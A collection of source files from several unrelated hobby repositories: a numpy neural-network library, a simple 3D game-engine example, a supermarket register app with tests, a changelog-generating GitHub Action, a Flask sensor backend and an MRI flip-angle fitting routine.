# Sort out the shapes so they can be broadcast together.
segment = np.expand_dims(segment, axis=1)
error_segment = np.expand_dims(node_errors[0:, height:height+1, width:width+1], axis=4).transpose(0,3,1,2,4)
segment = segment.reshape(*segment.shape[:2], -1, *segment.shape[-1:])
error_segment = error_segment.reshape(*error_segment.shape[:2], -1, *error_segment.shape[-1:])
self.optimizations["weight"][0] += np.mean(error_segment*segment, axis=0)
# Calculate the bias gradients based on self.bias_type.
if self.bias_type == "per_node":
self.optimizations["bias"][0] = np.mean(np.sum(node_errors, axis=(1,2)), axis=0, keepdims=True).T
elif self.bias_type == "single":
self.optimizations["bias"][0] = np.mean(np.sum(node_errors, axis=(1,2,3)))
else:
self.optimizations["bias"][0] = np.array([[0.0]])
# Return this layer's error for the next layer to use.
dE_dI = np.zeros(self.cached_data["data"].shape)
# Sort out the shapes so they can be broadcast together.
weights = np.expand_dims(self.weights.reshape(self.output_shape[2], self.filter_size[0], self.filter_size[1], self.layer_shape[1][2]), axis=0)
error_segments = np.expand_dims(node_errors, axis=1).transpose(0, 4, 2, 3, 1)
for _, height, width, i, j in get_segments(self.cached_data["data"], self.filter_size[0], self.filter_size[1], self.stride):
error_segment = error_segments[0:, 0:, height:height+1, width:width+1, 0:]
dE_dI[0:, i:i+self.filter_size[0], j:j+self.filter_size[1], 0:] += np.sum(error_segment*weights, axis=1)
return dE_dI
@accepts(self="any", optimizer=op.Base_Optimizer, epoch=int)
def update_vars(self, optimizer, epoch) -> None:
"""
Updates the trainable vars in the layer with the correct gradients.
Arguments:
optimizer : base_optimizer : An optimizer class that takes each layer's gradients and optimizes them to reach a local optima in the error faster.
epoch : int : The current epoch that the layer is training on.
"""
if self.trainable:
self.optimizations["weight"] = optimizer.map_data(self.optimizations["weight"], epoch)
self.optimizations["bias"] = optimizer.map_data(self.optimizations["bias"], epoch)
self.weights -= self.optimizations["weight"][0]
self.bias -= self.optimizations["bias"][0]
```
#### File: dlmb/layers/dropout.py
```python
from layers.base_layer import *
from utils.function_helpers import *
class Dropout(Base_Layer):
@accepts(self="any", keep_prob=float)
def __init__(self, keep_prob=0.5) -> None:
"""
Dropout is a type of regularization that creates a mask or probabilities.
This mask will then be applied to any incoming input,
in effect cancelling a certain percentage of the input.
Arguments:
keep_prob : float : The probability that each feature along each row of the input will be kept.
"""
super().__init__("Dropout")
self.keep_prob = keep_prob
self.built = False
def build(self) -> None:
self.built = True
@accepts(self="any", with_vars=bool)
def get_summary(self, with_vars) -> dict:
"""
get_summary() returns a summary of the layers features.
Arguments:
with_vars : bool : If True, get_summary() includes the layer's variables' values in the summary.
Returns:
summary : dict : A dictonary of the layers features.
"""
summary = {
"name":self.name,
"built":self.built,
"keep_prob":self.keep_prob
}
return summary
@accepts(self="any", layer_data=dict)
def load(self, layer_data) -> None:
"""
Takes the layer_data from the model this layer belongs to, and sets all vars equal to each key in layer_data.
Arguments:
layer_data : dict : A dictonary of saved vars from when this layer was first built and then saved.
"""
self.name = layer_data["name"]
self.built = layer_data["built"]
self.keep_prob = layer_data["keep_prob"]
@accepts(self="any", data=np.ndarray)
def map_data(self, data) -> np.ndarray:
"""
Applies a mask to some data in the form of (x * ([...] < keep_prop))/keep_prob.
Arguments:
data : np.ndarray : An n dimensional numpy array containing real numbers passed from the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array of outputs from this layer.
"""
data_shape = data.shape
# Try to write a decorator for this.
# Makes sure that the data is a 2d np.ndarray.
if len(data.shape) == 1:
data = data.reshape((1, data.shape[0]))
elif len(data.shape) > 1:
length = 1
for i in range(len(data.shape)-1):
length *= data.shape[i+1]
data = data.reshape((data.shape[0], length))
self.mask = np.random.random(data.shape) < self.keep_prob
return np.reshape((data*self.mask)/self.keep_prob, data_shape)
@accepts(self="any", error=np.ndarray)
def calculate_gradients(self, error) -> np.ndarray:
"""
Calculates the gradients of the error W.R.T to the input of this layer.
Arguments:
error : np.ndarray : An n dimensional numpy array containing the errors for the previous layer.
Returns:
output : np.ndarray : An n dimensional numpy array containing the errors for this layer.
"""
error_shape = error.shape
# Makes sure that the error is a 2d np.ndarray.
if len(error.shape) == 1:
error = error.reshape((1, error.shape[0]))
elif len(error.shape) > 1:
length = 1
for i in range(len(error.shape)-1):
length *= error.shape[i+1]
error = error.reshape((error.shape[0], length))
return np.reshape((error*self.mask)/self.keep_prob, error_shape)
@accepts(self="any", optimizer=op.Base_Optimizer, epoch=int)
def update_vars(self, optimizer, epoch) -> None:
pass
```
#### File: dlmb/dlmb/losses.py
```python
from abc import ABCMeta, abstractmethod
import numpy as np
from utils.function_helpers import *
class Base_Loss(metaclass=ABCMeta):
@abstractmethod
def __init__(self) -> None:
"""
The Base_Loss class is an abstract class for all loss functions.
All loss functions must inherit from Base_Loss.
"""
pass
@abstractmethod
def map_data(self, y_true:np.ndarray, y_pred:np.ndarray) -> np.ndarray:
"""
map_data() takes some data and applies a mathematical mapping to it.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Return:
output : np.ndarray : An n dimensional numpy array of the mapped data.
"""
return output
@abstractmethod
def calculate_gradients(self, y_true:np.ndarray, y_pred:np.ndarray) -> np.ndarray:
"""
calculate_gradients returns the derivative of the loss function W.R.T the data.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Return:
output : np.ndarray : An n dimensional numpy array of gradients.
"""
return output
class Mean_Squared_Error(Base_Loss):
def __init__(self) -> None:
"""
The MSE class is a commonly used regression loss function.
"""
pass
@accepts(self="any", y_true=np.ndarray, y_pred=np.ndarray)
def map_data(self, y_true, y_pred) -> np.ndarray:
"""
Calculates the squared distance between y_true and y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
output : np.ndarray : An n dimensional numpy array of the mean squared distance between y_true and y_pred.
"""
return (y_pred-y_true)**2/2
@accepts(self="any", y_true=np.ndarray, y_pred=np.ndarray)
def calculate_gradients(self, y_true, y_pred) -> np.ndarray:
"""
Calculates the derivatives of the function W.R.T y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
output : np.ndarray : An n dimensional numpy array of the calculated derivatives of the function W.R.T y_pred.
"""
return y_pred - y_true
class Binary_Crossentropy(Base_Loss):
def __init__(self) -> None:
"""
The Binary_crossentropy class measures the performance of a classification model whose output is a probability value between 0 and 1,
and where the number of outputs is less than 3.
"""
pass
@accepts(self="any", y_true=np.ndarray, y_pred=np.ndarray)
def map_data(self, y_true, y_pred) -> np.ndarray:
"""
Calculates the distance between y_true and y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
output : np.ndarray : The mean squared distance between y_true and y_pred.
"""
part1 = y_true*np.log(y_pred+1.0e-8) # I add 1.0e-8 to make sure 0 isn't going into np.log
part2 = (1-y_true)*np.log(1-y_pred+1.0e-8)
return -(part1 + part2)
@accepts(self="any", y_true=np.ndarray, y_pred=np.ndarray)
def calculate_gradients(self, y_true, y_pred) -> np.ndarray:
"""
Calculates the derivatives of the function W.R.T y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
output : np.ndarray : An n dimensional numpy array of the calculated derivatives of the function W.R.T y_pred.
"""
return division_check(y_true,y_pred) - division_check(1-y_true, 1-y_pred)
class Crossentropy(Base_Loss):
def __init__(self) -> None:
"""
The Crossentropy class measures the performance of a classification model whose output is a probability value between 0 and 1,
and where the number of outputs is more than 2.
"""
pass
@accepts(self="any", y_true=np.ndarray, y_pred=np.ndarray)
def map_data(self, y_true, y_pred) -> np.ndarray:
"""
Calculates the distance between y_true and y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
output : np.ndarray : The mean squared distance between y_true and y_pred.
"""
return -(y_true*np.log(y_pred+1.0e-8))
def calculate_gradients(self, y_pred:np.ndarray, y_true:np.ndarray) -> np.ndarray:
"""
Calculates the derivatives of the function W.R.T y_pred.
Arguments:
y_true : np.ndarray : An n dimensional numpy array of target values for the output of a neural-net model.
y_pred : np.ndarray : An n dimensional numpy array of predicted values from a neural-net model.
Returns:
output : np.ndarray : An n dimensional numpy array of the calculated derivatives of the function W.R.T y_pred.
"""
return division_check(y_true, y_pred)
def get(loss) -> Base_Loss:
"""
Finds and returns the correct loss function.
Arguments:
loss : Base_Loss/str : The loss function the user wants to use.
Returns:
loss : Base_Loss : The correct loss function.
"""
if isinstance(loss, str):
if loss.lower() in ("mse", "mean_squared_error"):
return Mean_Squared_Error()
elif loss.lower() in ("bc", "bce", "binary_crossentropy"):
return Binary_Crossentropy()
elif loss.lower() in ("ce", "crossentropy"):
return Crossentropy()
else:
print("At losses.get(): '%s' is not an available loss function. Has been set to 'Mean_squared_error' by default" % loss)
return Mean_squared_error()
elif isinstance(loss, Base_Loss):
return loss
else:
raise ValueError("At losses.get(): Expected 'class inheriting from Base_Loss' or 'str' for the argument 'loss', recieved '%s'" % type(loss))
``` |
{
"source": "Jonathan-Andrews/pyGE-Python-Game-Engine",
"score": 3
} |
#### File: pyGE-Python-Game-Engine/pyge/example.py
```python
import random
from window import Window
from gameObjects.object2d import Object2D
from gameObjects.object3d import Object3D
from gameObjects.primitives import *
class Game(Window):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.square = Object3D([
[-.5,-.5,-.5],
[.5,-.5,-.5],
[.5,.5,-.5],
[-.5,.5,-.5],
[-.5,-.5,.5],
[.5,-.5,.5],
[.5,.5,.5],
[-.5,.5,.5],
],
[
[0,1],
[1,2],
[2,3],
[3,0],
[4,5],
[5,6],
[6,7],
[7,4],
[0,4],
[1,5],
[2,6],
[3,7]
], draw_type='lines')
def on_run(self):
self.square.draw()
self.square.rotate_x(0.0078)
self.square.rotate_y(0.0078)
self.square.rotate_z(0.0078)
if __name__ == "__main__":
game = Game(400, 400, title='test')
game.run()
"""
TODO:
ADD USER INPUT.
ALLOW USER TO ADD COLOURS TO VERTICIES AND FACES AND STUFF.
"""
``` |
{
"source": "jonathanan/supermarket",
"score": 4
} |
#### File: jonathanan/supermarket/app.py
```python
import supermarket_register
import json
import os
def print_menu():
print('1. List products')
print('2. Add a product')
print('3. Remove a product')
print('4. Calculate total of products')
print('5. Save and exit')
if __name__ == '__main__':
# Read config and create Supermarket Register
product_file = open('config/products.json', 'r').read()
product_data = json.loads(product_file)
register = supermarket_register.SupermarketRegister(product_data)
while True:
print_menu()
print('Select option:')
option = int(input())
try:
if(option == 1):
register.list_products()
elif(option == 2):
print('Enter product code:')
code = str(input())
print('Enter product name:')
name = str(input())
print('Enter product price:')
price = str(input())
product = { code: { 'product': name, 'price': price } }
register.add_product(product)
elif(option == 3):
print('Enter product code:')
code = str(input())
register.remove_product(code)
elif(option == 4):
print('Enter product codes (separated by semicolons):')
os.environ['SKUS'] = str(input())
print('$', register.total_cost(os.environ['SKUS']))
elif(option == 5):
with open('config/products.json', 'w') as config:
json.dump(register.product_codes, config)
break
else:
print('Invalid option')
except KeyError:
print('Invalid input')
except ValueError:
print('Invalid input')
print()
```
#### File: jonathanan/supermarket/test_supermarket_register.py
```python
import supermarket_register
import unittest
class TestSupermarketRegister(unittest.TestCase):
"""
Test the SupermarketRegister class.
"""
def _mock_supermarket_instance(self):
"""
Test helper function for mocking a basic SupermarketRegister instance.
"""
product_codes = {
'XXXX-XXXX-XXXX-XXXX': {
'product': 'a',
'price': 1
}
}
return supermarket_register.SupermarketRegister(product_codes)
def test_init(self):
"""
Test initializing an instance of SupermarketRegister.
"""
# Test simple initialization
sm = self._mock_supermarket_instance()
self.assertIs(type(sm),supermarket_register.SupermarketRegister)
# Test invalid product code initialization
product_codes = {
'XXXX-XXXX-XXXX-XXX*': {
'product': 'a',
'price': 1
}
}
with self.assertRaises(ValueError):
supermarket_register.SupermarketRegister(product_codes)
# Test invalid price initialization
product_codes = {
'XXXX-XXXX-XXXX-XXXX': {
'product': 'a',
'price': -1
}
}
with self.assertRaises(ValueError):
supermarket_register.SupermarketRegister(product_codes)
def test_add_product(self):
"""
Test that an input of a product will be added to the Supermarket
register.
"""
sm = self._mock_supermarket_instance()
product = {
'BBBB-BBBB-BBBB-BBBB': {
'product': 'b',
'price': 2
}
}
sm.add_product(product)
# Test product is added
self.assertEqual(
sm.product_codes['BBBB-BBBB-BBBB-BBBB'],
{ 'product': 'b', 'price': 2 }
)
# Test KeyError is raised if product already exists
with self.assertRaises(KeyError):
sm.add_product(product)
def test_remove_product(self):
"""
Test that an input of a product will be removed from the Supermarket
register.
"""
sm = self._mock_supermarket_instance()
product = {
'XXXX-XXXX-XXXX-XXXX': {
'product': 'a',
'price': 1
}
}
sm.remove_product('XXXX-XXXX-XXXX-XXXX')
# Test product is removed
self.assertTrue('XXXX-XXXX-XXXX-XXXX' not in sm.product_codes)
# Test KeyError is raised if product does not exists.
with self.assertRaises(KeyError):
sm.remove_product('XXXX-XXXX-XXXX-XXXX')
def test_total_cost(self):
"""
Test that an input string of product codes separated by semicolons will
return the total price of all the products (including local sales tax).
"""
product_codes = {
'XXXX-XXXX-XXXX-XXXX': {
'product': 'x',
'price': 1
},
'YYYY-YYYY-YYYY-YYYY': {
'product': 'y',
'price': 1.12
},
'ZZZZ-ZZZZ-ZZZZ-ZZZZ': {
'product': 'z',
'price': 2.345
},
'AAAA-AAAA-AAAA-AAAA': {
'product': 'a',
'price': '1'
}
}
sm = supermarket_register.SupermarketRegister(product_codes)
# Test single item
self.assertEqual(
sm.total_cost('xxxx-xxxx-xxxx-xxxx'),
round(1+(1*sm.local_sales_tax),2)
)
# Test different spacing in input string
self.assertEqual(
sm.total_cost('xxxx-xxxx-xxxx-xxxx;YYYY-YYYY-YYYY-YYYY'),
round((1+1.12)+((1+1.12)*sm.local_sales_tax),2)
)
self.assertEqual(
sm.total_cost('xxxx-xxxx-xxxx-xxxx; YYYY-YYYY-YYYY-YYYY'),
round((1+1.12)+((1+1.12)*sm.local_sales_tax),2)
)
self.assertEqual(
sm.total_cost('xxxx-xxxx-xxxx-xxxx; YYYY-YYYY-YYYY-YYYY'),
round((1+1.12)+((1+1.12)*sm.local_sales_tax),2)
)
# Test price greater than two decimal places
self.assertEqual(
sm.total_cost('zZzZ-zZzZ-zZzZ-zZzZ'),
round(2.345+ (2.345*sm.local_sales_tax),2)
)
# Test price equals string integer
self.assertEqual(
sm.total_cost('aaaa-aaaa-aaaa-aaaa'),
round(int(1)+(int(1)*sm.local_sales_tax),2)
)
def test__validate_product_price(self):
"""
Test that the SupermarketRegister helper function will raise an error
if product price is less than or equal to 0. Otherwise, it returns None.
"""
sm = self._mock_supermarket_instance()
# Test vaild price int
self.assertIsNone(sm._validate_product_price(1))
# Test vaild price float
self.assertIsNone(sm._validate_product_price(1.1))
# Test invalid price 0
with self.assertRaises(ValueError):
sm._validate_product_price(0)
# Test invalid price < 0
with self.assertRaises(ValueError):
sm._validate_product_price(-1)
def test__validate_product_codes_pattern(self):
"""
Test that the SupermarketRegister helper function will raise an error
if product code pattern does match the following specifications:
- sixteen characters long, with dashes separating each four-character
group
- is alphanumeric
- case insensitive
Otherwise, it returns None
"""
sm = self._mock_supermarket_instance()
# Test valid product code pattern lowercase
self.assertIsNone(
sm._validate_product_code_pattern('abcd-1234-abcd-1234')
)
# Test valid product code pattern uppercase
self.assertIsNone(
sm._validate_product_code_pattern('ABCD-1234-ABCD-1234')
)
# Test valid product code pattern mixcase
self.assertIsNone(
sm._validate_product_code_pattern('A123-b123-C123-d123')
)
# Test invalid lowercase 3 character group
with self.assertRaises(ValueError):
sm._validate_product_code_pattern('aaaa-bbbb-cccc-123')
# Test invalid uppercase 3 character group
with self.assertRaises(ValueError):
sm._validate_product_code_pattern('AAAA-BBBB-CCCC-123')
# Test invalid lowercase 5 character group
with self.assertRaises(ValueError):
sm._validate_product_code_pattern('aaaa-bbbb-cccc-12345')
# Test invalid uppercase 5 character group
with self.assertRaises(ValueError):
sm._validate_product_code_pattern('AAAA-BBBB-CCCC-12345')
# Test invalid character
with self.assertRaises(ValueError):
sm._validate_product_code_pattern('AAA*-BBBB-CCCC-1234')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JonathanAquino/changelog-pr",
"score": 3
} |
#### File: JonathanAquino/changelog-pr/changelog-pr.py
```python
from datetime import datetime, timedelta
import json
import os
import re
import subprocess
from functools import cached_property
import requests
import yaml
class ChangelogCIBase:
"""Base Class for Changelog PR"""
github_api_url = 'https://api.github.com'
def __init__(
self,
repository,
event_path,
config,
current_branch,
filename='CHANGELOG.md',
token=None
):
self.repository = repository
self.filename = filename
self.config = config
self.current_branch = current_branch
self.token = token
@cached_property
def _get_request_headers(self):
"""Get headers for GitHub API request"""
headers = {
'Accept': 'application/vnd.github.v3+json'
}
# if the user adds `GITHUB_TOKEN` add it to API Request
# required for `private` repositories
if self.token:
headers.update({
'authorization': 'Bearer {token}'.format(token=self.token)
})
return headers
def get_changes_after_last_changelog_generation(self):
return NotImplemented
def parse_changelog(self, changes):
return NotImplemented
def _get_file_mode(self):
"""Gets the mode that the changelog file should be opened in"""
if os.path.exists(self.filename):
# if the changelog file exists
# opens it in read-write mode
file_mode = 'r+'
else:
# if the changelog file does not exists
# opens it in read-write mode
# but creates the file first also
file_mode = 'w+'
return file_mode
def _get_last_generated_on(self):
"""Returns the date that the changelog was last generated"""
if not os.path.exists(self.filename):
return ''
with open(self.filename, 'r') as f:
changelog = f.read()
matches = re.search('Last generated on: (.*)', changelog)
if not matches:
return ''
return matches.group(1)
def _commit_changelog(self, string_data):
"""Write changelog to the changelog file"""
file_mode = self._get_file_mode()
last_generated_on = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
header = 'This is an automatically generated changelog by JonathanAquino/changelog-pr.\n'
header += 'Ensure that your PRs have one or more of the following labels:\n'
header += '{labels}.\n'.format(labels=', '.join(self.config.pr_labels))
header += 'Last generated on: {last_generated_on}\n\n'.format(last_generated_on=last_generated_on)
do_not_modify_line = '--- DO NOT MODIFY THIS HEADER ---\n\n'
header += do_not_modify_line
with open(self.filename, file_mode) as f:
# read the existing data and store it in a variable
body = f.read()
# write at the top of the file
f.seek(0, 0)
f.write(header)
f.write(string_data)
if body:
parts = body.split(do_not_modify_line)
if len(parts) == 1:
# Header wasn't present (old changelog)
remainder = parts[0]
else:
# Header is present
remainder = parts[1]
f.write(remainder)
# TODO: Remove this debug logging
subprocess.run(['ssh', '-T', '[email protected]'])
subprocess.run(['git', 'add', self.filename])
# [skip ci] instructs Buildkite to ignore the commit and not create a build.
subprocess.run(
['git', 'commit', '-m', '(Changelog PR) Added Changelog', '-m', '[skip ci]']
)
subprocess.run(
['git', 'push', '-u', 'origin', self.current_branch]
)
def run(self):
"""Entrypoint to the Changelog PR"""
changes = self.changelog_generation()
# exit the method if there is no changes found
if not changes:
return
string_data = self.parse_changelog(changes)
print_message('Commit Changelog', message_type='group')
self._commit_changelog(string_data)
print_message('', message_type='endgroup')
class ChangelogCIPullRequest(ChangelogCIBase):
"""Generates and commits changelog using pull requests"""
def _get_changelog_line(self, item):
"""Generate each PR block of the changelog"""
if self.config.skip_changelog_label in item['labels']:
print_message('Skipping changelog for #{number}'.format(number=item['number']))
return ''
if self._get_pr_label_annotation(item):
pr_label_annotation = '[{pr_label_annotation}] '.format(pr_label_annotation=self._get_pr_label_annotation(item))
else:
pr_label_annotation = ''
title = item['title']
title = re.sub(self.config.pr_title_removal_regex, '', title, flags=re.IGNORECASE)
return "## [#{number}]({url}) ({merge_date})\n- {pr_label_annotation}{title}\n\n".format(
number=item['number'],
url=item['url'],
title=title,
merge_date=item['merged_at'][0:10],
pr_label_annotation=pr_label_annotation
)
def _get_pr_label_annotation(self, pull_request):
"""
Returns a string to put in the annotation in square brackets before the PR title.
"""
pr_labels = self.config.pr_labels
matching_pr_labels = []
if not pr_labels:
return ''
for pr_label in pr_labels:
if pr_label in pull_request['labels']:
matching_pr_labels.append(pr_label)
if not matching_pr_labels:
return 'choose PR label: ' + self.config.skip_changelog_label + ', ' + ', '.join(pr_labels)
return ', '.join(matching_pr_labels)
def changelog_generation(self):
"""Get all the merged pull request after the changelog was last generated."""
last_generated_on = self._get_last_generated_on()
if last_generated_on:
merged_date_filter = 'merged:>=' + last_generated_on
else:
# if the changelog hasn't been generated yet then
# take PRs generated in the last 15 minutes - that should get
# the current PR.
min_date = (datetime.utcnow() - timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%SZ')
merged_date_filter = 'merged:>=' + min_date
url = (
'{base_url}/search/issues'
'?q=repo:{repo_name}+'
'is:pr+'
'is:merged+'
'sort:author-date-asc+'
'{merged_date_filter}'
'&sort=merged'
).format(
base_url=self.github_api_url,
repo_name=self.repository,
merged_date_filter=merged_date_filter
)
print_message('URL: {url}'.format(url=url))
items = []
response = requests.get(url, headers=self._get_request_headers)
if response.status_code == 200:
response_data = response.json()
# `total_count` represents the number of
# pull requests returned by the API call
if response_data['total_count'] > 0:
for item in response_data['items']:
data = {
'title': item['title'],
'number': item['number'],
'url': item['html_url'],
'merged_at': item['closed_at'],
'labels': [label['name'] for label in item['labels']]
}
items.append(data)
else:
msg = (
f'There was no pull request '
f'made on {self.repository} after last_generated_on.'
)
print_message(msg, message_type='error')
else:
msg = (
f'Could not get pull requests for '
f'{self.repository} from GitHub API. '
f'response status code: {response.status_code}'
)
print_message(msg, message_type='error')
return items
def parse_changelog(self, changes):
return ''.join(
map(self._get_changelog_line, changes)
)
class ChangelogCIConfiguration:
"""Configuration class for Changelog PR"""
DEFAULT_PR_LABELS = []
def __init__(self, config_file):
# Initialize with default configuration
self.pr_labels = self.DEFAULT_PR_LABELS
self.skip_changelog_label = None
self.pr_title_removal_regex = None
self.user_raw_config = self.get_user_config(config_file)
self.validate_configuration()
@staticmethod
def get_user_config(config_file):
"""
Read user provided configuration file and
return user configuration
"""
if not config_file:
print_message(
'No Configuration file found, '
'falling back to default configuration to parse changelog',
message_type='warning'
)
return
try:
# parse config files with the extension .yml and .yaml
# using YAML syntax
if config_file.endswith('yml') or config_file.endswith('yaml'):
loader = yaml.safe_load
# parse config files with the extension .json
# using JSON syntax
elif config_file.endswith('json'):
loader = json.load
else:
print_message(
'We only support `JSON` or `YAML` file for configuration '
'falling back to default configuration to parse changelog',
message_type='error'
)
return
with open(config_file, 'r') as file:
config = loader(file)
return config
except Exception as e:
msg = (
f'Invalid Configuration file, error: {e}, '
'falling back to default configuration to parse changelog'
)
print_message(msg, message_type='error')
return
def validate_configuration(self):
"""
Validate all the configuration options and
update configuration attributes
"""
if not self.user_raw_config:
return
if not isinstance(self.user_raw_config, dict):
print_message(
'Configuration does not contain required mapping '
'falling back to default configuration to parse changelog',
message_type='error'
)
return
self.validate_pr_labels()
self.skip_changelog_label = self.user_raw_config.get('skip_changelog_label')
self.pr_title_removal_regex = self.user_raw_config.get('pr_title_removal_regex')
def validate_pr_labels(self):
"""Validate and set pr_labels configuration option"""
pr_labels = self.user_raw_config.get('pr_labels')
if not pr_labels:
msg = '`pr_labels` was not provided'
print_message(msg, message_type='warning')
return
if not isinstance(pr_labels, list):
msg = '`pr_labels` is not valid, It must be an Array/List.'
print_message(msg, message_type='error')
return
self.pr_labels = pr_labels
def print_message(message, message_type=None):
"""Helper function to print colorful outputs in GitHub Actions shell"""
# https://docs.github.com/en/actions/reference/workflow-commands-for-github-actions
if not message_type:
return subprocess.run(['echo', f'{message}'])
if message_type == 'endgroup':
return subprocess.run(['echo', '::endgroup::'])
return subprocess.run(['echo', f'::{message_type}::{message}'])
if __name__ == '__main__':
# Default environment variable from GitHub
# https://docs.github.com/en/actions/configuring-and-managing-workflows/using-environment-variables
event_path = os.environ['GITHUB_EVENT_PATH']
repository = os.environ['GITHUB_REPOSITORY']
current_branch = os.environ['INPUT_BRANCH']
# User inputs from workflow
filename = os.environ['INPUT_CHANGELOG_FILENAME']
config_file = os.environ['INPUT_CONFIG_FILE']
# Token provided from the workflow
token = os.environ.get('GITHUB_TOKEN')
# Committer username and email address
username = os.environ['INPUT_COMMITTER_USERNAME']
email = os.environ['INPUT_COMMITTER_EMAIL']
# Group: Checkout git repository
print_message('Checkout git repository', message_type='group')
subprocess.run(
[
'git', 'fetch', '--prune', '--unshallow', 'origin',
current_branch
]
)
subprocess.run(['git', 'checkout', current_branch])
print_message('', message_type='endgroup')
# Group: Configure Git
print_message('Configure Git', message_type='group')
subprocess.run(['git', 'config', 'user.name', username])
subprocess.run(['git', 'config', 'user.email', email])
print_message('', message_type='endgroup')
print_message('Parse Configuration', message_type='group')
config = ChangelogCIConfiguration(config_file)
print_message('', message_type='endgroup')
# Group: Generate Changelog
print_message('Generate Changelog', message_type='group')
# Initialize the Changelog PR
ci = ChangelogCIPullRequest(
repository,
event_path,
config,
current_branch,
filename=filename,
token=token
)
# Run Changelog PR
ci.run()
print_message('', message_type='endgroup')
``` |
{
"source": "JonathanArrance/rackbrain",
"score": 2
} |
#### File: coreservices/backend/backendAPI.py
```python
import os
import sys
import random
import api_lib
import mongo_lib
import APIsettings as settings
from pymongo import MongoClient
from flask import abort, request, jsonify, g, url_for
api = settings.API_VERSION
@mongo_lib.auth.verify_password
def verify_password(username_or_token, password):
# first try to authenticate by token
user = mongo_lib.Account.verify_auth_token(username_or_token)
if not user:
# try to authenticate with username/password
user = mongo_lib.Account.query.filter_by(username=username_or_token).first()
if not user or not user.verify_password(password):
return False
g.user = user
return True
#curl -u backend:rackbrain -i -k -X GET http://192.168.1.56:9443/api/1.0/token
@mongo_lib.app.route('/api/'+api+'/token')
@mongo_lib.auth.login_required
def get_auth_token():
token = g.user.generate_auth_token(3600)
return jsonify({'token': token.decode('ascii'), 'duration': 3600})
@mongo_lib.app.route('/api/'+api+'/alive')
def get_alive():
return jsonify({'data': 'Backend api is alive.'})
#curl -u token:x -i -k -X POST http://192.168.1.56:9443/api/1.0/reading
#-d '{'reading':'34','reading_type':'temp','sensor_serial':'434343434','reading_unit':'kelvin'}'
@mongo_lib.app.route('/api/'+api+'/reading', methods=['POST'])
@mongo_lib.auth.login_required
def add_reading():
#only the "backend" user can add readings, all other will be rejected
#times should be a unix timestamp since it accounts for date and time
req_data = request.get_json()
params = {'reading_type':req_data['reading_type'],'reading':req_data['reading'],
'sensor_serial':req_data['sensor_serial'],'reading_unit':req_data['reading_unit']
}
return api_lib.add_reading(params)
@mongo_lib.app.route('/api/'+api+'/sensor', methods=['GET'])
@mongo_lib.auth.login_required
def get_sensor():
req_data = request.get_json()
return api_lib.get_sensor(req_data['sensor_serial'])
'''
@mongo_lib.app.route('/api/'+api+'/readings', methods=['GET'])
@mongo_lib.auth.login_required
def get_readings():
#times should be a unix timestamp since it accounts for date and time
start = request.json.get('starttime')
end = request.json.get('endtime')
sensorid = request.json.get('sensorid')
params = {'start':start,'end':end,'sensorid':sensorid}
return api_lib.get_readings(params)
'''
if __name__ == '__main__':
#mongo_lib.app.run(host='0.0.0.0',port=9443, debug=True,ssl_context='adhoc')
mongo_lib.app.run(host='0.0.0.0',port=9443, debug=True)
```
#### File: rackbrain/sensors/sensor_lib.py
```python
import sys
import time
import logging
import requests
import settings
import random
LEVELS = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL
}
def get_backend_token():
"""
Desc: Get the token from the backend API service
Input: None
Output: out_dict - token
- duration - 3600 seconds
Error: 4xx http error
Note:
"""
#get a token from the backend API to send reading data
url = 'http://'+backend_api+'/api/'+settings.API_VERSION+'/token'
r = requests.get(url, auth=requests.auth.HTTPBasicAuth(settings.BACKEND_USER, settings.BACKEND_PASS))
out = r.raise_for_status()
if(out != None):
raise Exception('Could not authenticate DHT 11 to backend API')
return json.loads(r.text)
def send_reading(input_dict):
"""
Desc: Get the token from the backend API service
Input: input_dict - reading - the measured reding from the sensor
- reading_type - the unit the reading is measured in - ['temp','humidity','power','pressure'].
- reading_unit - the units the reading is measured in
- sensor_serial - the unique serial number for the sensor
- token - token needed to talk to the backend
Output: 'OK'
Error: 4xx http error
Note:
"""
headers = {"content-type":"application/json;charset=UTF-8","X-Auth-Token":str(input_dict['token'])}
data = "{'reading':'65','reading_type':'temp','sensor_serial':'67676767','reading_unit':'celcious'}"
#get a token from the backend API to send reading data
url = 'http://'+backend_api+'/api/'+settings.API_VERSION+'/reading'
try:
r = requests.post(url,headers=headers, data=data )
out = r.raise_for_status()
if(out != None):
raise Exception('Could not authenticate DHT 11 to backend API')
except Exception as e:
print e
return 'OK'
#return json.loads(r.text)
def get_sensor(serial):
"""
Desc: Get the info for a sensor
Input: None
Output: Uniqe integer serial
Error: ERROR
Note: None
"""
``` |
{
"source": "JonathanArvidsson/DCE-DSC-MRI_CodeCollection",
"score": 2
} |
#### File: original/McGill_Can/vfa.py
```python
import numpy as np
from numpy.linalg import norm
def despot(signal, alpha, TR):
# Ref: <NAME>., <NAME>., & <NAME>. (2005). MRM 53(1), 237–241. https://doi.org/10.1002/mrm.20314
# Based on Matlab code by <NAME>, McGill University
x = signal / np.tan(alpha)
y = signal / np.sin(alpha)
numerator = np.sum(x * y, axis = -1) - np.sum(x, axis = -1) * np.sum(y, axis = -1) / len(alpha)
